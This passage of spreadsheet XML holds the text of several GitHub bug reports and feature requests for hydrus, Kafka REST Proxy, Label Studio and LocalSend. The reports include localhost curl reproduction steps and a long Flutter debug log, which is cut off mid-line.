    <t>https://github.com/HTTP-APIs/hydrus/issues/462</t>
  </si>
  <si>
    <t>Possible mistake while refactoring</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm submitting a - [x] bug report. - [ ] feature request.  Current Behaviour: &lt;!-- Describe about the bug --&gt; @xadahiya I came across this while I was refactoring hydrus. I am referencing the commit https://github.com/HTTP-APIs/hydrus/commit/c0b492982b7093b38084d59afcfbbc52bb73d5e5#diff-57bc8a5a89375175a4bf37d573213377R353 (by @de-sh )which is already merged. In the changes to `hydrus/resources.py` under the POST method of the Item Collection class, line 353 the change made is  headers_ = [{"Location": get_hydrus_server_url() + get_api_name() + "/" + path + "/"}]  to  headers_ = [{"Location": "{}/{}/".format(get_hydrus_server_url(),get_api_name(),path)}]   Expected Behaviour: &lt;!-- Describe what will happen if bug is removed --&gt; I think that there has been a mistake while refactoring as the `path` variable is not correctly used in the newly formated string. I think it should be (notice the extra `{}` in the string formating.  headers_ = [{"Location": "{}{}/{}/".format(get_hydrus_server_url(),get_api_name(),path)}]   Steps to reproduce: &lt;!-- If you can then please provide the steps to reproduce the bug --&gt;  Do you want to work on this issue? &lt;!-- yes/no --&gt; Yes</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest/issues/37</t>
  </si>
  <si>
    <t>Catch MessageStreamsExistException from ConsumerConnector.createMessageStreams</t>
  </si>
  <si>
    <t>When ConsumersResource.readTopic is invoked, it calls createMessageStreams if there isn't already a stream. However, if the consumer has already invoked the method for a different topic, it will throw a MessageStreamsExistException. Currently this isn't being caught, so it'll be turned into a 500. We should catch it and turn it into a more useful error code. This will also require updating the docs since it'll introduce a new error code.</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest/issues/65</t>
  </si>
  <si>
    <t>Consumer read request hangs if you try to create two consumer instances with the same ID</t>
  </si>
  <si>
    <t>If you: 1. Create consumer with an ID 2. Read from a topic 3. Create consumer with same ID (don't delete previous one) 4. Read from topic the second create call succeeds and the read hangs. The stack trace shows it stuck trying to create a zookeeper node in a method that can also handle conflicts, which we'd expect since the IDs are the same. Turns out that we ended up conflating the meaning of "ID", which is used both to name the consumer nicely so you have readable consumer URLs and it got passed in as the ID for the underlying old Kafka consumer. The latter should really only be happening for debugging purposes since a random UUID (generated automatically for the consumer if the ID is omitted) is way more reliable. Things get a bit more confusing when we consider moving to the new consumer, which has a separate client ID that it uses to make logging on the brokers clearer and traceable to specific applications. A fix for this has to be careful about compatibility. I think the right thing to do is add a new parameter ("name") which will be used in the URL. If the "id" is specified and "name" isn't, "name" will default to "id". The underlying Kafka "consumer.id" will only be set if "id" was explicitly set. Then, the name is only relevant to the single instance of the REST proxy since consumer URLs are specific to a single process. We can return a 409 if we see a naming conflict during creation, which will prevent the subsequent hang during read. Finally, we'll want to deprecate and deemphasize the "id" field in the docs since "name" will now be the field they really should be using.</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest/issues/77</t>
  </si>
  <si>
    <t>Get java.lang.NoSuchMethodError: scala.collection.JavaConversions.asScalaIterable when calling the /topics/:topic endpoint</t>
  </si>
  <si>
    <t>Whenever I call the topics/:topic endpoint I get the following error  java.lang.NoSuchMethodError: scala.collection.JavaConversions.asScalaIterable(Ljava/util/Collection;)Lscala/collection/Iterable; at io.confluent.kafkarest.MetadataObserver.getTopic(MetadataObserver.java:91) at io.confluent.kafkarest.resources.TopicsResource.getTopic(TopicsResource.java:70) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:483) (stack trace continues)  From some preliminary research it appear this could be due to differences between the compile time version of scala and the runtime. http://stackoverflow.com/questions/4393946/nosuchmethoderror-when-attempting-to-implicitly-convert-a-java-to-scala-collecti I'm running on Centos. Here's the output of java -version  java version "1.8.0_05" Java(TM) SE Runtime Environment (build 1.8.0_05-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.5-b02, mixed mode)  I installed the package `confluent-platform-2.11.5`</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest/issues/118</t>
  </si>
  <si>
    <t>Not possible to send keyed Avro messages via Proxy</t>
  </si>
  <si>
    <t>We tried different ways, like curl or [kafka-node-rest](https://github.com/confluentinc/kafka-rest-node), to send a Avro message to a topic with a key. The topic is created and schema submitted to schema registry, however, sending the message fails with a HTTP error code 500. Setting like ports etc. are all defaults for the platform. Here an example what we tried with kafka-node-rest: - create the schemata for key and value  javascript var idSchema = new KafkaRest.AvroSchema('string'); var valueSchema = new KafkaRest.AvroSchema( { 'namespace': 'mynamespace', 'type': 'record', 'name': 'myschema', 'fields': [ { 'name': 'key', 'type': 'string' }, { 'name': 'date', 'type': 'string' }, { 'name': 'title', 'type': 'string' } ] });  - send it  javascript topic.produce(idSchema, valueSchema, { 'key': link, 'value': { 'key': link, 'date': date, 'title': title } }, function(err, res) {  });  what throws an error.  javascript { name: 'APIError', status: 500, message: 'Internal Server Error', data: { error_code: 500, message: 'Internal Server Error' } }  - sending without a key works  javascript topic.produce(valueSchema, { 'key': link, 'date': date, 'title': title }, function(err, res) {  });  result:  javascript { offsets: [ { partition: 0, offset: 750, error_code: null, error: null } ], key_schema_id: null, value_schema_id: 121 }  However, with the **kafka-avro-console-producer** works fine  shell ./bin/kafka-avro-console-producer --broker-list localhost:9092 --topic rss \ --property parse.key=true \ --property key.separator=, \ --property key.schema='{"type":"string"}' \ --property value.schema="{\"type\": \"record\", \"name\": \"rss\", \"fields\": [{\"name\": \"key\", \"type\": \"string\"}, {\"name\": \"title\", \"type\": \"string\"}, {\"name\": \"content\", \"type\": \"string\"}, {\"name\": \"date\", \"type\": \"string\"}]}" "test",{"key": "http://example.com", "title": "test title", "content": "test content", "date": "2015-10-18'T'20:20:20"}  Any idea what could be wrong? Maybe this issue relates to [#114](https://github.com/confluentinc/kafka-rest/issues/114). Thanks in advance.</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest/issues/341</t>
  </si>
  <si>
    <t>Consumer read takes long time with multiple consumers in consumer group</t>
  </si>
  <si>
    <t>A fundamental issue is seen with REST Proxy. Suppose if we create two consumer instances under the same consumer group, read call is taking longer time with calls with subsequent instance. Steps to reproduce: 1. Create my_consumer_instance1 and my_consumer_instance2 under my_json_consumer1: curl -H "Content-Type: application/vnd.kafka.v2+json" -d '{"name": "my_consumer_instance1", "format": "json", "auto.offset.reset": "earliest"}' http://localhost:8082/consumers/my_json_consumer1 curl -H "Content-Type: application/vnd.kafka.v2+json" -d '{"name": "my_consumer_instance2", "format": "json", "auto.offset.reset": "earliest"}' http://localhost:8082/consumers/my_json_consumer1 2. Subscribe both the instances to topic test1: curl -H "Content-Type: application/vnd.kafka.v2+json" -d '{"topics":["test1"]}' http://localhost:8082/consumers/my_json_consumer1/instances/my_consumer_instance1/subscription curl -H "Content-Type: application/vnd.kafka.v2+json" -d '{"topics":["test1"]}' http://localhost:8082/consumers/my_json_consumer1/instances/my_consumer_instance2/subscription 3. Read the message from my_consumer_instance1 several times and we will get responses back: curl -X GET -H "Accept: application/vnd.kafka.json.v2+json" http://localhost:8082/consumers/my_json_consumer1/instances/my_consumer_instance1/records 4. Read the message from my_consumer_instance2 and the call will hang. It will take around 8 minutes to get a response back: curl -X GET -H "Accept: application/vnd.kafka.json.v2+json" http://localhost:8082/consumers/my_json_consumer1/instances/my_consumer_instance2/records 5. Again read the message from my_consumer_instance1 and the call will hang. It will take some time to get a response back: curl -X GET -H "Accept: application/vnd.kafka.json.v2+json" http://localhost:8082/consumers/my_json_consumer1/instances/my_consumer_instance1/records</t>
  </si>
  <si>
    <t>https://github.com/confluentinc/kafka-rest/issues/475</t>
  </si>
  <si>
    <t>Kafka Rest API incorrect message returned by GET request for specified offset when data is compressed</t>
  </si>
  <si>
    <t>Test on a compressed topic vs a non-compressed topic. Should fail on compressed topic. GET /topics/myTopic/partitions/0/messages?offset=10&amp;count=1 Tested using this call on the rest api using docker image version 4.1.0 and 5.0.0 and re-created on both. When requesting an offset between 0-8 it returns offset 0, when requesting from 9-149 it returns 9, when requesting from 150-265 it returns 150 etc Performing a /topics/myTopic/partitions/0/messages?offset=0&amp;count=1000 shows that we have no offset gaps from 0 to 1000 Compressed format: ByteBufferMessageSet( LegacyRecordBatch(offset=8, Record(magic=1, attributes=1, compression=GZIP, crc=3359863988, CreateTime=1537196426232, key=0 bytes, value=703 bytes)), LegacyRecordBatch(offset=149, Record(magic=1, attributes=1, compression=GZIP, crc=712877603, CreateTime=1537196426317, key=0 bytes, value=6199 bytes)), Regular format: ByteBufferMessageSet( LegacyRecordBatch(offset=1, Record(magic=1, attributes=0, compression=NONE, crc=1309344491, CreateTime=-1, key=3 bytes, value=4 bytes)), LegacyRecordBatch(offset=2, Record(magic=1, attributes=0, compression=NONE, crc=1309344491, CreateTime=-1, key=3 bytes, value=4 bytes)), LegacyRecordBatch(offset=3, Record(magic=1, attributes=0, compression=NONE, crc=1309344491, CreateTime=-1, key=3 bytes, value=4 bytes)),</t>
  </si>
  <si>
    <t>https://github.com/HumanSignal/label-studio/issues/3033</t>
  </si>
  <si>
    <t>Token renewal button breaks "example projects curl"</t>
  </si>
  <si>
    <t>**Describe the bug** A clear and concise description of what the bug is. **To Reproduce** Steps to reproduce the behavior: 1. Go to local UI 2. Click on Account and Settings 3. Scroll down to 'Example fetch projects data:' 4. Click "refresh" on the token 5. Copy and paste example fetch curl into terminal **Expected behavior** Should get the projects, instead get error because the curl is incorrectly formatted **Screenshots** the closing quote comes after `Token` instead of after the actual token &lt;img width="613" alt="image" src="https://user-images.githubusercontent.com/22605641/193112860-f53d37b9-ed13-4ec6-9391-1fb44d73ef99.png"&gt; **Environment (please complete the following information):** - OS: [e.g. iOS] MacOS - Label Studio Version [e.g. 0.8.0] `1.6.0` **Additional context** The error only happens after refreshing the token https://user-images.githubusercontent.com/22605641/193113632-f010771f-5fd9-4c60-b58e-6f17bc7abf52.mov</t>
  </si>
  <si>
    <t>https://github.com/HumanSignal/label-studio/issues/3589</t>
  </si>
  <si>
    <t>Support URL signing when Image tag is an array of URIs</t>
  </si>
  <si>
    <t>**Is your feature request related to a problem? Please describe.** When an array of URIs are passed as a task's Image property, URL-signing does not work. This is true both with and without use of the Repeater Tag in the XML config. Example task json:  { "data": { "image": [ "gs://bucket/image_scale_1.jpg", "gs://bucket/image_scale_2.jpg", "gs://bucket/image_scale_3.jpg", "gs://bucket/image_scale_4.jpg", ], "thumb": "gs://bucket/thumbnail.jpg" } }  Here is the error:  [2023-01-11 21:25:03,030] [io_storages.base_models::resolve_uri::85] [INFO] Can't resolve URI=["gs://bucket/image_scale_1.jpg", "gs://bucket/image_scale_2.jpg", "gs://bucket/image_scale_3.jpg","gs://bucket/image_scale_4.jpg"] Traceback (most recent call last): File "/label-studio/label_studio/io_storages/base_models.py", line 83, in resolve_uri return uri.replace(extracted_uri, http_url) AttributeError: 'list' object has no attribute 'replace' [2023-01-11 21:25:03,031] [io_storages.utils::get_uri_via_regex::25] [WARNING] Can't parse task.data to match URI. Reason: Match is not found.  This issue has been documented and discussed in detail in slack [here](https://label-studio.slack.com/archives/CQ8LYPPJS/p1673542950503319). **Describe the solution you'd like** As the [Repeater Tag documentation](https://labelstud.io/tags/repeater.html#Example) suggests, an array of URIs should be a valid value for a task's Image property and work with the URL-signing feature in the backend. Repeater should iterate through each of the values and create signed URLs, which is the case when a single value is passed, with the assumption that the individual elements meet whatever validation checks that are already required. **Describe alternatives you've considered** The desired behavior exists already - it's just about enabling it for all elements in an array, so I can't imagine an alternative. **Additional context** I'm willing to work on the solution to this issue. CC: @AbubakarSaad</t>
  </si>
  <si>
    <t>https://github.com/HumanSignal/label-studio/issues/3649</t>
  </si>
  <si>
    <t>Incorrect display projects per page after selecting a number greater than 30</t>
  </si>
  <si>
    <t>**Describe the bug** If we have more than 30 projects and we choose in the tool to display more than 30 projects per page, only 30 are displayed. However, the number of pages will decrease and some projects will not be displayed. **To Reproduce** Steps to reproduce the behavior: Add more than 100 projects Choose 50 or 100 projects per page in projects list view Count the number of projects (quantity is wrong) Change to next page (you can see that the sum of the number of projects is less than 100) **Expected behavior** The page should display the same number of projects as selected per page. The number of projects on all pages should be the same as the number of all projects. **Screenshots** n/a -- can provide if really needed **Environment** OS: Mint Label Studio Version Release 1.7.1 **Additional context** In this line `page_size` should be passed as parameter. https://github.com/heartexlabs/label-studio/blob/9308125b3633997d2546a26a7855804c850cc32a/label_studio/frontend/src/pages/Projects/Projects.js#L70 I found the error together with @mikbuch</t>
  </si>
  <si>
    <t>https://github.com/localsend/localsend/issues/461</t>
  </si>
  <si>
    <t>[BUG] [500] Internal Server Error, can't send file to PC</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug almost the same issue, both version Localsend 1.7.0 and 1.9.1. 1 PC: win10 2 Android Smart Phones(Mi 10 Ultra &amp; Mi Max 3) Both Android Phones can send/receive file to/from each other smoothly. PC can send file to 2 phones. Android Phones can't send file to PC.  To reproduce 1. Go to '' 2. Click on '' 3. Scroll down to '' 4. See error  Expected behavior File should be sent as expected.  Screenshots ![_20230510213449](https://github.com/localsend/localsend/assets/3594904/840b2373-1b51-4168-aadf-1f4a31536070) Debugging -&gt; HTTP Logs cleaned and retried send text file, got this log ![_20230510225644](https://github.com/localsend/localsend/assets/3594904/64cee1e7-ba8a-4470-8ed7-262aeef831c5)  Desktop (please complete the following information) _No response_  Smartphone (please complete the following information) - Device: Mi 10 Ultra - OS: MIUI 12.5.6 / Android 11 - Version: 1.7.0 / 1.9.1  Additional context _No response_</t>
  </si>
  <si>
    <t>https://github.com/localsend/localsend/issues/1777</t>
  </si>
  <si>
    <t>Bug report: `ERR_EMPTY_RESPONSE` when sharing text via link</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug When I try to share text via a link, when I try to open the "file" that contains the text, there is an exception and I get an `ERR_EMPTY_RESPONSE` error. See log below.  To reproduce 1. Open the app (v1.15.4 and in the latest commit too) in macOS (not tested on other systems) 2. Click the "Text" button and type something and confirm 3. Click on "Send mode" and select "Share via link" 4. Open the link in the browser 5. You see something like this: ![CleanShot 2024-09-11 at 02 01 38@2x](https://github.com/user-attachments/assets/58240d09-86a8-4967-b838-8936f87422e5) 7. Try opening 8. `ERR_EMPTY_RESPONSE` error  Expected behavior No error  Screenshots _No response_  Desktop (please complete the following information) macOS 14.6.1, localsend 1.15.4  Smartphone (please complete the following information) - No  Additional context log:  Couldn't read values in CFPrefsPlistSource&lt;0x600001b18510&gt; (Domain: org.localsend.shared_group, User: kCFPreferencesAnyUser, ByHost: Yes, Container: (null), Contents Need Refresh: Yes): Using kCFPreferencesAnyUser with a container is only allowed for System Containers, detaching from cfprefsd flutter: The Dart VM service is listening on http://127.0.0.1:49315/zH5d_eXQ_pw=/ flutter: dynamic_color: Accent color detected. flutter: 2024-09-11 01:54:20.272816 [INFO] [PersistenceService] Existing version: 2 flutter: 2024-09-11 01:54:20.384603 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.384861 [INFO] [Refena] Provider initialized: [Provider&lt;PersistenceService&gt;] flutter: 2024-09-11 01:54:20.384927 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.385778 [INFO] [Refena] - Value: Instance of 'PersistenceService' flutter: 2024-09-11 01:54:20.385830 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.395807 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.395877 [INFO] [Refena] Provider initialized: [SettingsService] flutter: 2024-09-11 01:54:20.395902 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.400174 [INFO] [Refena] - Value: SettingsState(showToken: 015d1260-1332-4423-a025-6a25fd9b0db7, alias: Cute Broccoli, theme: ThemeMode.system, colorMode: ColorMode.localsend, locale: BaseAppLocale{languageCode: he, scriptCode: null, countryCode: null}, port: 53317, multicastGroup: 224.0.0.167, destination: null, saveToGallery: true, saveToHistory: true, quickSave: false, quickSaveFromFavorites: false, receivePin: null, autoFinish: false, minimizeToTray: true, https: true, sendMode: SendMode.single, saveWindowPlacement: true, enableAnimations: true, deviceType: null, deviceModel: null, shareViaLinkAutoAccept: false, discoveryTimeout: 500) flutter: 2024-09-11 01:54:20.400207 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.404330 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.404396 [INFO] [Refena] Provider initialized: [Provider&lt;DeviceInfoResult&gt;] flutter: 2024-09-11 01:54:20.404413 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.404444 [INFO] [Refena] - Value: Instance of 'DeviceInfoResult' flutter: 2024-09-11 01:54:20.404457 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.404972 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.405022 [INFO] [Refena] Provider initialized: [ViewProvider&lt;DeviceInfoResult&gt;] flutter: 2024-09-11 01:54:20.405041 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.405133 [INFO] [Refena] - Value: Instance of 'DeviceInfoResult' flutter: 2024-09-11 01:54:20.405144 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.405716 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.405743 [INFO] [Refena] Provider initialized: [IsolateController] flutter: 2024-09-11 01:54:20.405755 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.406023 [INFO] [Refena] - Value: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.https, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: false), httpTargetDiscovery: null) flutter: 2024-09-11 01:54:20.406036 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.407662 [INFO] [Refena] Action dispatched: [RefenaContainer] -&gt; [IsolateController.IsolateSetupAction] flutter: 2024-09-11 01:54:20.413364 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.413401 [INFO] [Refena] Provider initialized: [appArgumentsProvider] flutter: 2024-09-11 01:54:20.413413 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.413938 [INFO] [Refena] - Value: [-NSDocumentRevisionsDebugMode, YES] flutter: 2024-09-11 01:54:20.414 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.414141 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.414324 [INFO] [Refena] Provider initialized: [tvProvider] flutter: 2024-09-11 01:54:20.414347 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.414368 [INFO] [Refena] - Value: false flutter: 2024-09-11 01:54:20.414381 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.414716 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.414731 [INFO] [Refena] Provider initialized: [Provider&lt;DynamicColors?&gt;] flutter: 2024-09-11 01:54:20.414741 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.414757 [INFO] [Refena] - Value: Instance of 'DynamicColors' flutter: 2024-09-11 01:54:20.414770 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.415556 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.415578 [INFO] [Refena] Provider initialized: [sleepProvider] flutter: 2024-09-11 01:54:20.415589 [INFO] [Refena] - Reason: CONTAINER OVERRIDE flutter: 2024-09-11 01:54:20.415648 [INFO] [Refena] - Value: false flutter: 2024-09-11 01:54:20.415659 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.431556 [INFO] [ChildIsolateMain] Child isolate is ready: HttpTargetDiscoveryIsolate (logLevel: INFO) flutter: 2024-09-11 01:54:20.431504 [INFO] [ChildIsolateMain] Child isolate is ready: HttpScanDiscoveryIsolate (logLevel: INFO) flutter: 2024-09-11 01:54:20.440269 [INFO] [ChildIsolateMain] Child isolate is ready: MulticastDiscoveryIsolate (logLevel: INFO) flutter: 2024-09-11 01:54:20.443114 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.443417 [INFO] [Refena] Change by [IsolateController] triggered by [IsolateSetupAction] flutter: 2024-09-11 01:54:20.443589 [INFO] [Refena] - Prev: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.https, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: false), httpTargetDiscovery: null) flutter: 2024-09-11 01:54:20.443893 [INFO] [Refena] - Next: ParentIsolateState(syncState: SyncState(securityContext: &lt;SecurityContext&gt;, deviceInfo: Instance of 'DeviceInfoResult', alias: Cute Broccoli, port: 53317, protocol: ProtocolType.https, multicastGroup: 224.0.0.167, discoveryTimeout: 500, serverRunning: true, download: false), httpTargetDiscovery: Instance of 'IsolateConnector&lt;IsolateTaskResult&lt;Device?&gt;, SendToIsolateData&lt;IsolateTask&lt;HttpTargetTask') flutter: 2024-09-11 01:54:20.443940 [INFO] [Refena] - Rebuild (0): &lt;none&gt; flutter: 2024-09-11 01:54:20.443989 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.444274 [INFO] [Refena] Action finished: [IsolateController.IsolateSetupAction] flutter: 2024-09-11 01:54:20.445426 [WARNING] [Multicast] Could not bind UDP multicast port (ip: [192.168.33.12], group: 224.0.0.167, port: 53317) flutter: SocketException: Failed to create datagram socket (OS Error: Address already in use, errno = 48), address = 0.0.0.0, port = 53317 flutter: 2024-09-11 01:54:20.496371 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.496444 [INFO] [Refena] Provider initialized: [Provider&lt;WindowDimensionsController&gt;] flutter: 2024-09-11 01:54:20.496458 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.496498 [INFO] [Refena] - Value: Instance of 'WindowDimensionsController' flutter: 2024-09-11 01:54:20.496509 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.635511 [INFO] [Multicast] Announce via UDP flutter: 2024-09-11 01:54:20.811189 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.811263 [INFO] [Refena] Provider initialized: [HomePageController] flutter: 2024-09-11 01:54:20.811278 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.811328 [INFO] [Refena] - Value: Instance of 'HomePageVm' flutter: 2024-09-11 01:54:20.811353 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.922756 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.922821 [INFO] [Refena] Provider initialized: [LocalIpService] flutter: 2024-09-11 01:54:20.922835 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.924135 [INFO] [Refena] - Value: NetworkState(localIps: (), initialized: false) flutter: 2024-09-11 01:54:20.924159 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.924964 [INFO] [Refena] Action dispatched: [LocalIpService] -&gt; [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:20.927018 [INFO] [Refena] Action finished: [LocalIpService.InitLocalIpAction] flutter: 2024-09-11 01:54:20.927797 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.927846 [INFO] [Refena] Provider initialized: [ServerService] flutter: 2024-09-11 01:54:20.927859 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.927882 [INFO] [Refena] - Value: null flutter: 2024-09-11 01:54:20.927894 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.928459 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.928500 [INFO] [Refena] Provider initialized: [_showAdvancedProvider] flutter: 2024-09-11 01:54:20.928513 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.928553 [INFO] [Refena] - Value: false flutter: 2024-09-11 01:54:20.928571 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.929102 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.929176 [INFO] [Refena] Provider initialized: [_showHistoryButtonProvider] flutter: 2024-09-11 01:54:20.929189 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.929201 [INFO] [Refena] - Value: true flutter: 2024-09-11 01:54:20.929210 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.929441 [INFO] [Refena]  flutter: 2024-09-11 01:54:20.929461 [INFO] [Refena] Provider initialized: [ViewProvider&lt;ReceiveTabVm&gt;] flutter: 2024-09-11 01:54:20.929471 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:20.929490 [INFO] [Refena] - Value: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:20.929499 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.012115 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.012169 [INFO] [Refena] Provider initialized: [animationProvider] flutter: 2024-09-11 01:54:21.012181 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:21.012204 [INFO] [Refena] - Value: true flutter: 2024-09-11 01:54:21.012213 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.072422 [INFO] [Refena] Action dispatched: [HomePage] -&gt; [HomePageController.ChangeTabAction] flutter: 2024-09-11 01:54:21.073253 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.073279 [INFO] [Refena] Change by [HomePageController] triggered by [ChangeTabAction] flutter: 2024-09-11 01:54:21.073303 [INFO] [Refena] - Prev: Instance of 'HomePageVm' flutter: 2024-09-11 01:54:21.073317 [INFO] [Refena] - Next: Instance of 'HomePageVm' flutter: 2024-09-11 01:54:21.073363 [INFO] [Refena] - Rebuild (1): [HomePage] flutter: 2024-09-11 01:54:21.073373 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.073412 [INFO] [Refena] Action finished: [HomePageController.ChangeTabAction] flutter: 2024-09-11 01:54:21.082046 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.082101 [INFO] [Refena] Provider initialized: [SecurityService] flutter: 2024-09-11 01:54:21.082113 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:21.082150 [INFO] [Refena] - Value: StoredSecurityContext(&lt;privateKey&gt;, &lt;publicKey&gt;, &lt;certificate&gt;, &lt;certificateHash&gt;) flutter: 2024-09-11 01:54:21.082161 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.083159 [INFO] [Server] Starting server flutter: 2024-09-11 01:54:21.104659 [INFO] [Server] Server started. (Port: 53317, HTTPS only) flutter: 2024-09-11 01:54:21.106191 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.106235 [INFO] [Refena] Change by [ServerService] flutter: 2024-09-11 01:54:21.106259 [INFO] [Refena] - Prev: null flutter: 2024-09-11 01:54:21.108512 [INFO] [Refena] - Next: ServerState(httpServer: Instance of 'SimpleServer', alias: Cute Broccoli, port: 53317, https: true, session: null, webSendState: null, pinAttempts: {}) flutter: 2024-09-11 01:54:21.108545 [INFO] [Refena] - Rebuild (1): [ViewProvider&lt;ReceiveTabVm&gt;] flutter: 2024-09-11 01:54:21.108557 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.109854 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.109893 [INFO] [Refena] Provider initialized: [FavoritesService] flutter: 2024-09-11 01:54:21.109924 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:21.109967 [INFO] [Refena] - Value: [] flutter: 2024-09-11 01:54:21.110006 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.110620 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.110671 [INFO] [Refena] Provider initialized: [DiscoveryLogger] flutter: 2024-09-11 01:54:21.110681 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:21.110729 [INFO] [Refena] - Value: [] flutter: 2024-09-11 01:54:21.110778 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.111137 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.111174 [INFO] [Refena] Provider initialized: [NearbyDevicesService] flutter: 2024-09-11 01:54:21.111186 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:21.112415 [INFO] [Refena] - Value: NearbyDevicesState(runningFavoriteScan: false, runningIps: {}, devices: {}) flutter: 2024-09-11 01:54:21.112435 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.112520 [INFO] [Refena] Action dispatched: [HomePage] -&gt; [NearbyDevicesService.StartMulticastListener] flutter: 2024-09-11 01:54:21.114278 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.114361 [INFO] [Refena] Rebuild by [ViewProvider&lt;ReceiveTabVm&gt;] triggered by [ChangeEvent(ServerService)] flutter: 2024-09-11 01:54:21.114381 [INFO] [Refena] - Prev: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:21.114397 [INFO] [Refena] - Next: Instance of 'ReceiveTabVm' flutter: 2024-09-11 01:54:21.114441 [INFO] [Refena] - Rebuild (1): [ReceiveTab] flutter: 2024-09-11 01:54:21.114453 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.119916 [INFO] [Refena]  flutter: 2024-09-11 01:54:21.119941 [INFO] [Refena] Provider initialized: [PurchaseService] flutter: 2024-09-11 01:54:21.119951 [INFO] [Refena] - Reason: INITIAL ACCESS flutter: 2024-09-11 01:54:21.121380 [INFO] [Refena] - Value: PurchaseState(prices: {}, purchases: {}, pending: false) flutter: 2024-09-11 01:54:21.121422 [INFO] [Refena]  flutter: 2024-09-11 